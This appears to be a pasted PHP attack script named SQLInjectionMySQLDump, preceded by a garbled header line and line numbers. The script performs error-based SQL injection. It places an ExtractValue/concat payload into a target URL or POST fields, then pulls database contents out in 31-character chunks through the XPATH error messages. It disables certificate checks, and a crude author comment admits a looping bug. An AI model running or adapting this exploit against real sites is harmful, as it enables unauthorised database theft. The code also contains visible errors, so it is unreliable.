php set_time_limit false class SQLInjectionMySQLDum protected ch postp

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
<?php
set_time_limit(false);
class SQLInjectionMySQLDump {
protected $ch, $postparams = array(), $url, $data = '';
public function setPOST($params) {
if(is_array($params) && count($params) > 0) {
$this->postparams = $params;
return $this;
}
return false;
}
public function setURL($url) {
$info = parse_url($url);
if(!empty($info['scheme']) && !empty($info['host'])) {
$this->url = $url;
return $this;
}
return false;
}
public function run($filename = false) {
$this->ch = curl_init();
curl_setopt($this->ch, CURLOPT_RETURNTRANSFER, true);
if(preg_match('/^https/', $this->url))
curl_setopt($this->ch, CURLOPT_SSL_VERIFYPEER, false);
echo $this->get("SELECT 'QWERTYUIOPASDFGHJKLZXCVBNMqwertyuiopasdfghjklzxcvbnm' LIMIT 1");
}
protected function get($sql) {
$str = '';
$start = 1;
do {
$t = 'MID(('.$sql.'),'.$start.',31)';
$nstr = $this->request($t);
echo $t."\n$nstr\n"; //debug
$str .= $nstr;
$start += 31;
if(strlen($nstr) != 31)
break;
}while($start < 100); //при while(true) зависает сука :D ошибка где-то. устал шото я
return $str;
}
protected function request($sql) {
$ssql = 'or(ExtractValue(1,concat(0x3a,('; //start sql inj query
$esql = '))))='; //end sql inj query
$query = $ssql.$sql.$esql; //sql inj query
curl_setopt($this->ch, CURLOPT_URL, str_replace('{sql}', $query, $this->url));
if(count($this->postparams > 0)) {
foreach($this->postparams as $k => $v)
$this->postparams[$k] = str_replace('{sql}', $query, $v);
curl_setopt($this->ch, CURLOPT_POST, true);
curl_setopt($this->ch, CURLOPT_POSTFIELDS, $this->postparams);
}
$res = curl_exec($this->ch);
if(count($this->postparams > 0))
curl_setopt($this->ch, CURLOPT_POST, false);
preg_match('/XPATH syntax error\: \'\:(.*?)\'/', $res, $data);
return isset($data[1]) ? $data[1] : false;
}
}